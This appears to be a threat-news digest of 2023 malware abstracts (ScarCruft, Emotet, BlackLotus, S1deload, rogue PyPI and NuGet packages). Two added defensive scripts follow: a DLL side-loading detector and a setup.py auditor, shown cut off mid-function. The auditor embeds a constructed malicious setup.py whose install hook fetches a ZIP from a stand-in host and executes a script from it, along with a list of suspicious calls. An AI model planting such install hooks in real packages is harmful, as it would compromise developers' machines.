The North Korean advanced persistent threat (APT) actor dubbed ScarCruft is using weaponized Microsoft Compiled HTML Help (CHM) files to download additional malware. According to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group's continuous efforts to refine and retool its tactics to sidestep detection. "The group is constantly evolving its tools, techniques, and procedures while experimenting with new file formats and methods to bypass security vendors," Zscaler researchers Sudeep Singh and Naveen Selvan said in a new analysis published Tuesday. ScarCruft, also tracked under the names APT37, Reaper, RedEyes, and Ricochet Chollima, has exhibited an increased operational tempo since the start of the year, targeting various South Korean entities for espionage purposes. It is known to be active since at least 2012. Last month, ASEC disclosed a campaign that employed ... (The Hacker News)
March 22, 2023
Rogue ChatGPT extension FakeGPT hijacked Facebook accounts Full Text
Abstract
A tainted version of the legitimate ChatGPT extension for Chrome, designed to steal Facebook accounts, has thousands of downloads. Guardio’s security team uncovered a new variant of a malicious Chat-GPT Chrome Extension that was already downloaded ... (Security Affairs)
March 22, 2023
Experts released PoC exploits for severe flaws in Netgear Orbi routers Full Text
Abstract
Cisco Talos researchers published PoC exploits for vulnerabilities in Netgear Orbi 750 series router and extender satellites. Netgear Orbi is a line of mesh Wi-Fi systems designed to provide high-speed, reliable Wi-Fi coverage throughout a home or business. ... (Security Affairs)
March 22, 2023
Rogue NuGet Packages Infect .NET Developers with Crypto-Stealing Malware Full Text
Abstract
The NuGet repository is the target of a new "sophisticated and highly-malicious attack" aiming to infect .NET developer systems with cryptocurrency stealer malware. The 13 rogue packages, which were downloaded more than 160,000 times over the past month, have since been taken down. "The packages contained a PowerShell script that would execute upon installation and trigger a download of a 'second stage' payload, which could be remotely executed," JFrog researchers Natan Nehorai and Brian Moussalli said. While NuGet packages have been in the past found to contain vulnerabilities and be abused to propagate phishing links, the development marks the first-ever discovery of packages with malicious code. Three of the most downloaded packages – Coinbase.Core, Anarchy.Wrapper.Net, and DiscordRichPresence.API – alone accounted for 166,000 downloads, although it's also possible that the threat actors artificially inflated the download counts using bo ... (The Hacker News)
March 22, 2023
NAPLISTENER: New Malware in REF2924 Group’s Arsenal for Bypassing Detection Full Text
Abstract
The threat group tracked as REF2924 has been observed deploying previously unseen malware in its attacks aimed at entities in South and Southeast Asia. The malware, dubbed NAPLISTENER by Elastic Security Labs, is an HTTP listener programmed in C# and is designed to evade "network-based forms of detection." REF2924 is the moniker assigned to an activity cluster linked to attacks against an entity in Afghanistan as well as the Foreign Affairs Office of an ASEAN member in 2022. The threat actor's modus operandi suggests overlaps with another hacking group dubbed ChamelGang, which was documented by Russian cybersecurity company Positive Technologies in October 2021. Attacks orchestrated by the group are said to have exploited internet-exposed Microsoft Exchange servers to deploy backdoors such as DOORME, SIESTAGRAPH, and ShadowPad. DOORME, an Internet Information Services (IIS) backdoor module, provides remote access to a contested network and executes addit ... (The Hacker News)
March 20, 2023
New DotRunpeX Malware Delivers Multiple Malware Families via Malicious Ads Full Text
Abstract
A new piece of malware dubbed dotRunpeX is being used to distribute numerous known malware families such as Agent Tesla, Ave Maria, BitRAT, FormBook, LokiBot, NetWire, Raccoon Stealer, RedLine Stealer, Remcos, Rhadamanthys, and Vidar. "DotRunpeX is a new injector written in .NET using the Process Hollowing technique and used to infect systems with a variety of known malware families," Check Point said in a report published last week. Said to be in active development, dotRunpeX arrives as a second-stage malware in the infection chain, often deployed via a downloader (aka loader) that's transmitted through phishing emails as malicious attachments. Alternatively, it's known to leverage malicious Google Ads on search result pages to direct unsuspecting users searching for popular software such as AnyDesk and LastPass to copycat sites hosting trojanized installers. The latest DotRunpeX artifacts, first spotted in October 2022, add an extra o ... (The Hacker News)
March 20, 2023
Emotet is back after a three-month hiatus Full Text
Abstract
The infamous Emotet malware is back after a short hiatus, threat actors are spreading it via Microsoft OneNote email attachments. The Emotet malware returns after a three-month hiatus and threat actors are distributing it via Microsoft OneNote email ... (Security Affairs)
March 20, 2023
Emotet Rises Again: Evades Macro Security via OneNote Attachments Full Text
Abstract
The notorious Emotet malware, in its return after a short hiatus, is now being distributed via Microsoft OneNote email attachments in an attempt to bypass macro-based security restrictions and compromise systems. Emotet, linked to a threat actor tracked as Gold Crestwood, Mummy Spider, or TA542, continues to be a potent and resilient threat despite attempts by law enforcement to take it down. A derivative of the Cridex banking worm – which was subsequently replaced by Dridex around the same time GameOver Zeus was disrupted in 2014 – Emotet has evolved into a "monetized platform for other threat actors to run malicious campaigns on a pay-per-install (PPI) model, allowing theft of sensitive data and ransom extortion." While Emotet infections have acted as a conduit to deliver Cobalt Strike, IcedID, Qakbot, Quantum ransomware, and TrickBot, its return in late 2021 was facilitated by means of TrickBot. "Emotet is known for extended periods of ina ... (The Hacker News)
March 16, 2023
New dotRunpeX Malware Injector Spotted in the Wild Full Text
Abstract
Check Point Research laid bare tech details of the dotRunpeX injector that delivers a range of known malware families such as AgentTesla, AsyncRat, AveMaria/WarzoneRAT, BitRAT, Formbook, and more. The first-stage loaders are primarily delivered via phishing emails that contain malicious ... (Cyware)
March 14, 2023
New Fake ChatGPT Chrome Extension Stealing Facebook Ad Accounts with Thousands of Installs Full Text
Abstract
A Chrome Extension offering quick access to fake ChatGPT functionality was found to be hijacking Facebook accounts and installing hidden account backdoors. Notably, the Facebook app “backdoor” gives the threat actors super-admin permissions.Cyware
March 13, 2023
Golang-based GoBruteforcer Malware Targets Popular Web Services Full Text
Abstract
GoBruteforcer, a new Golang-based botnet, has been seen scanning for and infecting well-known web services including FTP and MySQL, and deploys an IRC bot to communicate. At the time of the attack, GoBruteforcer uses a Classless Inter-Domain Routing (CIDR) block for scanning the network. The best w ... Cyware
March 13, 2023
Hackers Push BatLoader via Google Search Ads Full Text
Abstract
BATLOADER, the notorious malware loader, was seen exploiting Google Ads to deliver secondary payloads such as Vidar Stealer and Ursnif. In their ads, attackers impersonate legitimate apps and services such as Adobe, Tableau, ChatGPT, Spotify, and Zoom. Other samples of BATLOADER display enhanced capabilit ... Cyware
March 13, 2023
Fake ChatGPT Chrome Extension Hijacking Facebook Accounts for Malicious Advertising Full Text
Abstract
A fake ChatGPT-branded Chrome browser extension has been found to come with capabilities to hijack Facebook accounts and create rogue admin accounts, highlighting one of the different methods cyber criminals are using to distribute malware. "By hijacking high-profile Facebook business accounts, the threat actor creates an elite army of Facebook bots and a malicious paid media apparatus," Guardio Labs researcher Nati Tal said in a technical report. "This allows it to push Facebook paid ads at the expense of its victims in a self-propagating worm-like manner." The "Quick access to Chat GPT" extension, which is said to have attracted 2,000 installations per day since March 3, 2023, has since been pulled by Google from the Chrome Web Store as of March 9, 2023. The browser add-on is promoted through Facebook-sponsored posts, and while it offers the ability to connect to the ChatGPT service, it's also engineered to surreptitiously harvest cookies and ... The Hacker News
March 13, 2023
Warning: AI-generated YouTube Video Tutorials Spreading Infostealer Malware Full Text
Abstract
Threat actors have been increasingly observed using AI-generated YouTube Videos to spread a variety of stealer malware such as Raccoon, RedLine, and Vidar. "The videos lure users by pretending to be tutorials on how to download cracked versions of software such as Photoshop, Premiere Pro, Autodesk 3ds Max, AutoCAD, and other products that are licensed products available only to paid users," CloudSEK researcher Pavan Karthick M said. Just as the ransomware landscape comprises core developers and affiliates who are in charge of identifying potential targets and actually carrying out the attacks, the information stealer ecosystem also consists of threat actors known as traffers who are recruited to spread the malware using different methods. One of the popular malware distribution channels is YouTube, with CloudSEK witnessing a 200-300% month-over-month increase in videos containing links to stealer malware in the description section. These links are often obfuscated u ... The Hacker News
March 11, 2023
BATLOADER Malware Uses Google Ads to Deliver Vidar Stealer and Ursnif Payloads Full Text
Abstract
The malware downloader known as BATLOADER has been observed abusing Google Ads to deliver secondary payloads like Vidar Stealer and Ursnif. According to cybersecurity company eSentire, malicious ads are used to spoof a wide range of legitimate apps and services such as Adobe, OpenAI's ChatGPT, Spotify, Tableau, and Zoom. BATLOADER, as the name suggests, is a loader that's responsible for distributing next-stage malware such as information stealers, banking malware, Cobalt Strike, and even ransomware. One of the key traits of the BATLOADER operations is the use of software impersonation tactics for malware delivery. This is achieved by setting up lookalike websites that host Windows installer files masquerading as legitimate apps to trigger the infection sequence when a user searching for the software clicks a rogue ad on the Google search results page. These MSI installer files, when launched, execute Python scripts that contain the BATLOADER payload to retrieve t ... The Hacker News
March 11, 2023
PlugX malware delivered by exploiting flaws in Chinese programs Full Text
Abstract
Researchers at ASEC (AhnLab Security Emergency response Center) observed threat actors deploying PlugX malware by exploiting flaws in the Chinese remote control programs Sunlogin and Awesun ... Security Affairs
March 10, 2023
Latest version of Xenomorph Android malware targets 400 banks Full Text
Abstract
A new version of the Xenomorph Android malware includes a new automated transfer system framework and targets 400 banks. The author of the Xenomorph Android malware, the Hadoken Security Group, continues to improve their malicious code. In February...Security Affairs
March 10, 2023
Xenomorph Android Banking Trojan Returns with a New and More Powerful Variant Full Text
Abstract
A new variant of the Android banking trojan named Xenomorph has surfaced in the wild, latest findings from ThreatFabric reveal. Named "Xenomorph 3rd generation" by the Hadoken Security Group, the threat actor behind the operation, the updated version comes with new features that allow it to perform financial fraud in a seamless manner. "This new version of the malware adds many new capabilities to an already feature-rich Android banker, most notably the introduction of a very extensive runtime engine powered by Accessibility services, which is used by actors to implement a complete ATS framework," the Dutch security firm said in a report shared with The Hacker News. Xenomorph first came to light a year ago in February 2022, when it was found to target 56 European banks through dropper apps published on the Google Play Store. In contrast, the latest iteration of the banker – which has a dedicated website advertising its features – is designed to targe ... The Hacker News
March 9, 2023
OneNote Used as New Distribution Channel for Qakbot Malware Full Text
Abstract
Researchers observed a notable spike in emails utilizing malicious OneNote attachments, especially to drop Qakbot or QBot. The operators have apparently reorganized their infrastructure to target specific regions and industries.Cyware
March 9, 2023
Beware! AI Generates a Truly Polymorphic Malware BlackMamba Full Text
Abstract
A BlackMamba proof-of-concept attack was demonstrated by researchers. The technology on which ChatGPT is built, the large language model (LLM), was used to create a polymorphic keylogger functionality on the fly. The malware was tested against a renowned EDR system and resulted in absolutely no ale ... Cyware
March 8, 2023
Qakbot Strikes Again With New Delivery Method; Puts Millions of Devices at Risk Full Text
Abstract
Researchers at Trellix Advanced Research Center have detected various campaigns that use OneNote documents to distribute Qakbot and other malware such as AsyncRAT, IcedID, and XWorm.Cyware
March 8, 2023
SYS01 Campaign Uses Multiple Attack Evasion Tactics; Stayed Invisible for Five Months Full Text
Abstract
Morphisec researchers have been tracking this info-stealer since November 2022. This campaign uses lures and loading tactics similar to another info-stealer named S1deload, however, the final payload delivered is different.Cyware
March 7, 2023
New SYS01stealer Threat Uses Facebook Ads to Target Critical Infrastructure Firms Full Text
Abstract
Morphisec has tracked an advanced info-stealer called SYS01stealer since November 2022. It uses similar lures and loading techniques to another information stealer recently named S1deload by Bitdefender, but the actual payload is different.Cyware
March 07, 2023
SYS01stealer: New Threat Using Facebook Ads to Target Critical Infrastructure Firms Full Text
Abstract
Cybersecurity researchers have discovered a new information stealer dubbed SYS01stealer targeting critical government infrastructure employees, manufacturing companies, and other sectors. "The threat actors behind the campaign are targeting Facebook business accounts by using Google ads and fake Facebook profiles that promote things like games, adult content, and cracked software, etc. to lure victims into downloading a malicious file," Morphisec said in a report shared with The Hacker News. "The attack is designed to steal sensitive information, including login data, cookies, and Facebook ad and business account information." The Israeli cybersecurity company said the campaign was initially tied to a financially motivated cybercriminal operation dubbed Ducktail by Zscaler. However, WithSecure, which first documented the Ducktail activity cluster in July 2022, said the two intrusion sets are different from one another, indicating how the threat actors ... The Hacker News
March 7, 2023
Expert released PoC exploit code for critical Microsoft Word RCE flaw Full Text
Abstract
Security researcher Joshua Drake released a proof-of-concept exploit for a critical vulnerability in Microsoft Word, tracked as CVE-2023-21716 (CVSS ... Security Affairs
March 07, 2023
Shein’s Android App Caught Transmitting Clipboard Data to Remote Servers Full Text
Abstract
An older version of Shein's Android application suffered from a bug that periodically captured and transmitted clipboard contents to a remote server. The Microsoft 365 Defender Research Team said it discovered the problem in version 7.9.2 of the app that was released on December 16, 2021. The issue has since been addressed as of May 2022. Shein, originally named ZZKKO, is a Chinese online fast fashion retailer based in Singapore. The app, which is currently at version 9.0.0, has over 100 million downloads on the Google Play Store. The tech giant said it's not "specifically aware of any malicious intent behind the behavior," but noted that the function isn't necessary to perform tasks on the app. It further pointed out that launching the application after copying any content to the device clipboard automatically triggered an HTTP POST request containing the data to the server "api-service[.]shein[.]com." To mitigate such privacy risks, Goo ... The Hacker News
March 06, 2023
New HiatusRAT Malware Targets Business-Grade Routers to Covertly Spy on Victims Full Text
Abstract
A never-before-seen complex malware is targeting business-grade routers to covertly spy on victims in Latin America, Europe, and North America at least since July 2022. The elusive campaign, dubbed Hiatus by Lumen Black Lotus Labs, has been found to deploy two malicious binaries, a remote access trojan dubbed HiatusRAT and a variant of tcpdump that makes it possible to capture packets on the target device. "Once a targeted system is infected, HiatusRAT allows the threat actor to remotely interact with the system, and it utilizes prebuilt functionality [...] to convert the compromised machine into a covert proxy for the threat actor," the company said in a report shared with The Hacker News. "The packet-capture binary enables the actor to monitor router traffic on ports associated with email and file-transfer communications." The threat cluster primarily singles out end-of-life (EoL) DrayTek Vigor router models 2960 and 3900, with approximately 100 ... The Hacker News
March 6, 2023
New Feature-Rich Post-Exploitation Tool ‘Exfiltrator-22’ Linked With LockBit Full Text
Abstract
Hackers in the underground marketplace have introduced a new Exfiltrator-22, or EX-22, post-exploitation framework. According to the CYFIRMA team, LockBit 3.0 affiliates or its members are most probably behind its development. The developers have used the same C2 infrastructure previously exposed i ... Cyware
March 6, 2023
Colour-Blind, a fully featured info stealer and RAT in PyPI Full Text
Abstract
Researchers from Kroll's Cyber Threat Intelligence team discovered a fully featured information stealer, tracked as 'Colour-Blind', in a malicious Python package uploaded to the Python Package Index (PyPI) ... Security Affairs
March 04, 2023
New FiXS ATM Malware Targeting Mexican Banks Full Text
Abstract
A new ATM malware strain dubbed FiXS has been observed targeting Mexican banks since the start of February 2023. "The ATM malware is hidden inside another not-malicious-looking program," Latin American cybersecurity firm Metabase Q said in a report shared with The Hacker News. Besides requiring interaction via an external keyboard, the Windows-based ATM malware is also vendor-agnostic and is capable of infecting any teller machine that supports CEN/XFS (short for eXtensions for Financial Services). The exact mode of compromise remains unknown but Metabase Q's Dan Regalado told The Hacker News that it's likely that "attackers found a way to interact with the ATM via touchscreen." FiXS is also said to be similar to another strain of ATM malware codenamed Ploutus that has enabled cybercriminals to extract cash from ATMs by using an external keyboard or by sending an SMS message. One of the notable characteristics of FiXS is its ability to disp ... The Hacker News
March 4, 2023
FiXS, a new ATM malware that is targeting Mexican banks Full Text
Abstract
Researchers at Metabase Q discovered a new ATM malware, dubbed FiXS, that has been employed in attacks against Mexican banks since February 2023 ... Security Affairs
March 3, 2023
Mustang Panda’s Latest ‘MQsTTang’ Backdoor Treads New Ground With Qt and MQTT Full Text
Abstract
This backdoor is part of an ongoing campaign that researchers can trace back to early January 2023. Unlike most of the group’s malware, MQsTTang doesn’t seem to be based on existing families or publicly available projects.Cyware
March 02, 2023
Experts Identify Fully-Featured Info Stealer and Trojan in Python Package on PyPI Full Text
Abstract
A malicious Python package uploaded to the Python Package Index (PyPI) has been found to contain a fully-featured information stealer and remote access trojan. The package, named colourfool, was identified by Kroll's Cyber Threat Intelligence team, with the company calling the malware Colour-Blind. "The 'Colour-Blind' malware points to the democratization of cybercrime that could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others," Kroll researchers Dave Truman and George Glass said in a report shared with The Hacker News. colourfool, like other rogue Python modules discovered in recent months, conceals its malicious code in the setup script, which points to a ZIP archive payload hosted on Discord. The file contains a Python script (code.py) that comes with different modules designed to log keystrokes, steal cookies, and even disable security software. The malware, besides performing defense ev ... The Hacker News
March 02, 2023
SysUpdate Malware Strikes Again with Linux Version and New Evasion Tactics Full Text
Abstract
The threat actor known as Lucky Mouse has developed a Linux version of a malware toolkit called SysUpdate, expanding on its ability to target devices running the operating system. The oldest version of the updated artifact dates back to July 2022, with the malware incorporating new features designed to evade security software and resist reverse engineering. Cybersecurity company Trend Micro said it observed the equivalent Windows variant in June 2022, nearly one month after the command-and-control (C2) infrastructure was set up. Lucky Mouse is also tracked under the monikers APT27, Bronze Union, Emissary Panda, and Iron Tiger, and is known to utilize a variety of malware such as SysUpdate, HyperBro, PlugX, and a Linux backdoor dubbed rshell. Over the past two years, campaigns orchestrated by the threat group have embraced supply chain compromises of legitimate apps like Able Desktop and MiMi Chat to obtain remote access to compromised systems. In October 2022, Intrin ... The Hacker News
March 2, 2023
R3NIN Sniffer Malware Stealing Credit Card Data From E-Commerce Consumers Full Text
Abstract
In the event of a website being hacked, attackers may implant an encoded malicious script into the web server, designed to activate when a target user accesses the corrupted web page.Cyware
March 01, 2023
BlackLotus Becomes First UEFI Bootkit Malware to Bypass Secure Boot on Windows 11 Full Text
Abstract
A stealthy Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus has become the first publicly known malware capable of bypassing Secure Boot defenses, making it a potent threat in the cyber landscape. "This bootkit can run even on fully up-to-date Windows 11 systems with UEFI Secure Boot enabled," Slovak cybersecurity company ESET said in a report shared with The Hacker News. UEFI bootkits are deployed in the system firmware and allow full control over the operating system (OS) boot process, thereby making it possible to disable OS-level security mechanisms and deploy arbitrary payloads during startup with high privileges. Offered for sale at $5,000 (and $200 per new subsequent version), the powerful and persistent toolkit is programmed in Assembly and C and is 80 kilobytes in size. It also features geofencing capabilities to avoid infecting computers in Armenia, Belarus, Kazakhstan, Moldova, Romania, Russia, and Ukraine. Details about BlackLotus f ... The Hacker News
March 1, 2023
BlackLotus is the first bootkit bypassing UEFI Secure Boot on Windows 11 Full Text
Abstract
Researchers from ESET discovered a stealthy Unified Extensible Firmware Interface (UEFI) bootkit, dubbed BlackLotus, that is able to bypass Secure Boot on Windows 11 ... Security Affairs
March 1, 2023
Iron Tiger’s SysUpdate Reappears, Adds Linux Targeting Full Text
Abstract
In 2022, Trend Micro researchers noticed that Iron Tiger had updated SysUpdate, one of its custom malware families, to include new features and add malware infection support for the Linux platform.Cyware
March 01, 2023
Parallax RAT Targeting Cryptocurrency Firms with Sophisticated Injection Techniques Full Text
Abstract
Cryptocurrency companies are being targeted as part of a new campaign that delivers a remote access trojan called Parallax RAT. The malware "uses injection techniques to hide within legitimate processes, making it difficult to detect," Uptycs said in a new report. "Once it has been successfully injected, attackers can interact with their victim via Windows Notepad that likely serves as a communication channel." Parallax RAT grants attackers remote access to victim machines. It comes with features to upload and download files as well as record keystrokes and screen captures. It has been put to use since early 2020 and was previously delivered via COVID-19-themed lures. In February 2022, Proofpoint detailed an activity cluster dubbed TA2541 targeting aviation, aerospace, transportation, manufacturing, and defense industries using different RATs, including Parallax. The first payload is a Visual C++ malware that employs the process hollowing technique to ... The Hacker News
February 27, 2023
Researchers Share New Insights Into RIG Exploit Kit Malware’s Operations Full Text
Abstract
The RIG exploit kit (EK) touched an all-time high successful exploitation rate of nearly 30% in 2022, new findings reveal. "RIG EK is a financially-motivated program that has been active since 2014," Swiss cybersecurity company PRODAFT said in an exhaustive report shared with The Hacker News. "Although it has yet to substantially change its exploits in its more recent activity, the type and version of the malware they distribute constantly change. The frequency of updating samples ranges from weekly to daily updates." Exploit kits are programs used to distribute malware to large numbers of victims by taking advantage of known security flaws in commonly-used software such as web browsers. The fact that RIG EK runs as a service model means threat actors can financially compensate the RIG EK administrator for installing malware of their choice on victim machines. The RIG EK operators primarily employ malvertising to ensure a high infection rate and large-scale ... The Hacker News
February 27, 2023
Attackers Abuse SM Platforms to Deliver S1deload Stealer Full Text
Abstract
Bitdefender disclosed an active malware campaign targeting Facebook and YouTube users with S1deload Stealer, using adult themes as bait. The new information stealer compromises user credentials and exploits system resources to mine BEAM cryptocurrency. The malware has the ability to propagate its m ... Cyware
February 27, 2023
PlugX Trojan disguised as a legitimate Windows open-source tool in recent attacks Full Text
Abstract
Trend Micro uncovered a new wave of attacks aimed at distributing the PlugX remote access trojan disguised as a legitimate open-source Windows debugger tool ... Security Affairs
February 27, 2023
TA569: SocGholish and Beyond Full Text
Abstract
TA569 leverages many types of injections, traffic distribution systems (TDS), and payloads including, but not limited to, SocGholish. In addition to serving as an initial access broker, these injects imply it may be running a pay-per-install service.Cyware
February 27, 2023
Wiper malware goes global, destructive attacks surge Full Text
Abstract
The threat landscape and organizations’ attack surfaces are constantly transforming, and cybercriminals’ ability to design and adapt their techniques to suit this evolving environment continues to pose significant risks to all businesses.Cyware
February 27, 2023
ChromeLoader Malware Targeting Gamers via Fake Nintendo and Steam Game Hacks Full Text
Abstract
A new ChromeLoader malware campaign has been observed being distributed via virtual hard disk (VHD) files, marking a deviation from the ISO optical disc image format. "These VHD files are being distributed with filenames that make them appear like either hacks or cracks for Nintendo and Steam games," AhnLab Security Emergency response Center (ASEC) said in a report last week. ChromeLoader (aka Choziosi Loader or ChromeBack) originally surfaced in January 2022 as a browser-hijacking credential stealer but has since evolved into a more potent, multifaceted threat capable of stealing sensitive data, deploying ransomware, and even dropping decompression bombs. The primary goal of the malware is to compromise web browsers like Google Chrome, and modify the browser settings to intercept and direct traffic to dubious advertising websites. What's more, ChromeLoader has emerged as a conduit to carry out click fraud by leveraging a browser extension to monetize cl ... The Hacker News
February 27, 2023
PureCrypter used to deliver AgentTesla to govt organizations Full Text
Abstract
An unknown threat actor is targeting government organizations with the PureCrypter downloader, Menlo Security's Menlo Labs researchers reported ... Security Affairs
February 27, 2023
DarkCloud Stealer Targets Users and Businesses Worldwide Full Text
Abstract
Hackers were found distributing the sophisticated DarkCloud Stealer info-stealer through various spam campaigns. The malware operates through a multi-stage process and is capable of collecting sensitive information from a victim's computer or mobile device. The malware operators claim to target applica ... Cyware
February 24, 2023
PureCrypter Malware Downloader Targets Government Entities Through Discord Full Text
Abstract
Menlo Labs has uncovered an unknown threat actor that’s leveraging an evasive threat campaign distributed via Discord that features the PureCrypter downloader and targets government entities.Cyware
February 23, 2023
Imposter HTTP libraries lurk on PyPI Full Text
Abstract
The descriptions for these packages, for the most part, don't hint at their malicious intent. Some are disguised as real libraries and make flattering comparisons between their capabilities and those of known, legitimate HTTP libraries.Cyware
February 23, 2023
Lazarus Group Likely Using New WinorDLL64 Backdoor to Exfiltrate Sensitive Data Full Text
Abstract
A new backdoor associated with a malware downloader named Wslink has been discovered, with the tool likely used by the notorious North Korea-aligned Lazarus Group, new findings reveal. The payload, dubbed WinorDLL64 by ESET, is a fully-featured implant that can exfiltrate, overwrite, and delete files; execute PowerShell commands; and obtain comprehensive information about the underlying machine. Its other features comprise listing active sessions, creating and terminating processes, enumerating drives, and compressing directories. Wslink was first documented by the Slovak cybersecurity firm in October 2021, describing it as a "simple yet remarkable" malware loader that's capable of executing received modules in memory. "The Wslink payload can be leveraged later for lateral movement, due to its specific interest in network sessions," ESET researcher Vladislav Hrčka said. "The Wslink loader listens on a port specified in the configuration and can ... The Hacker News
February 23, 2023
New S1deload Malware Hijacking Users’ Social Media Accounts and Mining Cryptocurrency Full Text
Abstract
An active malware campaign has set its sights on Facebook and YouTube users by leveraging a new information stealer to hijack the accounts and abuse the systems' resources to mine cryptocurrency. Bitdefender is calling the malware S1deload Stealer for its use of DLL side-loading techniques to get past security defenses and execute its malicious components. "Once infected, S1deload Stealer steals user credentials, emulates human behavior to artificially boost videos and other content engagement, assesses the value of individual accounts (such as identifying corporate social media admins), mines for BEAM cryptocurrency, and propagates the malicious link to the user's followers," Bitdefender researcher Dávid ÁCS said. Put differently, the goal of the campaign is to take control of the users' Facebook and YouTube accounts and rent out access to raise view counts and likes for videos and posts shared on the platforms. More than 600 unique users are estimate ... The Hacker News
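S1deload gets its name from DLL side-loading: a legitimate, signed executable is dropped next to a malicious DLL that carries the name of a library the executable imports, so the Windows loader picks the attacker's copy from the application directory before the real one in System32. The block below is an added hunting example, not Bitdefender's code or anything taken from the campaign. Given a module-load listing of the kind a Sysmon event ID 7 export or a live process dump produces, it flags well-known Windows DLL names loaded from outside the Windows directory, and separately flags unsigned DLLs loaded by a signed executable out of a user-writable location. The listing, the process names and the DLL name subset are constructed for the demonstration.

```python
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ModuleLoad:
    pid: int
    process: str   # image name of the loading process
    path: str      # full path of the loaded module
    signed: bool   # Authenticode status as the sensor reported it


# Constructed module-load listing shaped like a Sysmon event ID 7 export.
# Process and file names are invented; only the shape matters.
SAMPLE_LOADS = [
    ModuleLoad(1204, "explorer.exe", "C:\\Windows\\System32\\ntdll.dll", True),
    ModuleLoad(4410, "vendorsync.exe", "C:\\Users\\alice\\AppData\\Local\\Temp\\VSync\\vendorsync.exe", True),
    ModuleLoad(4410, "vendorsync.exe", "C:\\Users\\alice\\AppData\\Local\\Temp\\VSync\\cryptbase.dll", False),
    ModuleLoad(4410, "vendorsync.exe", "C:\\Windows\\System32\\kernel32.dll", True),
    ModuleLoad(4410, "vendorsync.exe", "C:\\Users\\alice\\AppData\\Local\\Temp\\VSync\\helper.dll", False),
    ModuleLoad(5120, "chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.dll", True),
]

# Windows-supplied DLL names that are frequent side-loading targets (small subset).
SYSTEM_DLL_NAMES = {
    "cryptbase.dll", "version.dll", "dwmapi.dll", "wininet.dll", "userenv.dll",
    "profapi.dll", "ntdll.dll", "kernel32.dll", "msvcp140.dll", "vcruntime140.dll",
}
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")


def _parent(path):
    return str(PureWindowsPath(path).parent).lower()


def _name(path):
    return PureWindowsPath(path).name.lower()


def find_sideload_candidates(loads):
    """Return (reason, ModuleLoad) pairs worth triaging for DLL side-loading."""
    # Directory of each PID's signed main image, when that directory is user-writable.
    signed_exe_dirs = {}
    for m in loads:
        low = m.path.lower()
        if m.signed and low.endswith(".exe") and any(mark in low for mark in USER_WRITABLE_MARKERS):
            signed_exe_dirs[m.pid] = _parent(m.path)

    findings = []
    for m in loads:
        low = m.path.lower()
        if not low.endswith(".dll"):
            continue
        if _name(m.path) in SYSTEM_DLL_NAMES and not low.startswith(TRUSTED_DIRS):
            findings.append(("system DLL name loaded from outside Windows dir", m))
        elif not m.signed and signed_exe_dirs.get(m.pid) == _parent(m.path):
            findings.append(("unsigned DLL beside signed EXE in user-writable dir", m))
    return findings


def finding_names(findings):
    """Sorted basenames of the flagged modules (convenience for reporting and tests)."""
    return sorted(_name(m.path) for _, m in findings)


if __name__ == "__main__":
    for reason, m in find_sideload_candidates(SAMPLE_LOADS):
        print(f"pid {m.pid} {m.process}: {m.path} -> {reason}")
```

The first rule is the high-signal one (a `cryptbase.dll` loaded from a Temp directory has no benign explanation); the second is noisier, because legitimate portable software does ship unsigned helper DLLs, so it is better treated as an enrichment than an alert on its own.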
February 23, 2023
Python Developers Warned of Trojanized PyPI Packages Mimicking Popular Libraries Full Text
Abstract
Cybersecurity researchers are warning of "imposter packages" mimicking popular libraries available on the Python Package Index (PyPI) repository. The 41 malicious PyPI packages have been found to pose as typosquatted variants of legitimate modules such as HTTP, AIOHTTP, requests, urllib, and urllib3. The names of the packages are as follows: aio5, aio6, htps1, httiop, httops, httplat, httpscolor, httpsing, httpslib, httpsos, httpsp, httpssp, httpssus, httpsus, httpxgetter, httpxmodifier, httpxrequester, httpxrequesterv2, httpxv2, httpxv3, libhttps, piphttps, pohttp, requestsd, requestse, requestst, ulrlib3, urelib3, urklib3, urlkib3, urllb, urllib33, urolib3, xhttpsp. "The descriptions for these packages, for the most part, don't hint at their malicious intent," ReversingLabs researcher Lucija Valentić said in a new writeup. "Some are disguised as real libraries and make flattering comparisons between their capabilities and those of known, legitimate ... The Hacker News
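The two PyPI items above (the colourfool package that hides its loader in the setup script, and the typosquatted HTTP-library names) come down to checks a maintainer or a package-intake pipeline can automate. The following is an added example, not code from Kroll, ReversingLabs or the packages themselves. It statically audits a setup.py with Python's ast module, flagging custom setuptools install hooks, network and process-spawning calls and embedded URLs (the pattern described for colourfool: an install-time hook that fetches a ZIP and runs a script from it), and it scores a candidate package name against a short list of popular libraries with edit-distance similarity plus a substring rule for names like piphttps. The sample setup.py, its URL, the popular-name list and the 0.8 cutoff are all constructed for the demonstration.

```python
import ast
import difflib
import re

# Constructed setup.py modelled on the reported pattern (remote ZIP fetched and
# executed from a setuptools install hook). Illustrative text, not the real package.
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import io, os, subprocess, urllib.request, zipfile

class PostInstall(install):
    def run(self):
        install.run(self)
        blob = urllib.request.urlopen("https://cdn.example-chat.invalid/attachments/0/0/payload.zip").read()
        zipfile.ZipFile(io.BytesIO(blob)).extractall(os.path.expanduser("~"))
        subprocess.Popen(["python", os.path.expanduser("~/code.py")])

setup(name="colourfool", version="0.1", cmdclass={"install": PostInstall})
'''

# Calls that have no business running at pip-install time.
SUSPICIOUS_CALLS = {
    "urllib.request.urlopen", "requests.get", "requests.post",
    "subprocess.Popen", "subprocess.run", "subprocess.call", "os.system",
    "exec", "eval", "base64.b64decode", "marshal.loads",
}
# setuptools command classes whose subclasses run during install/build.
INSTALL_HOOK_BASES = {"install", "develop", "egg_info", "build_py"}
URL_RE = re.compile(r"https?://[^\s'\"]+")

# Constructed list of well-known names an attacker would typosquat.
POPULAR = ["requests", "urllib3", "aiohttp", "httpx", "http", "urllib"]


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def audit_setup_py(source):
    """Flag install hooks, dangerous calls and embedded URLs in setup.py source."""
    findings = []
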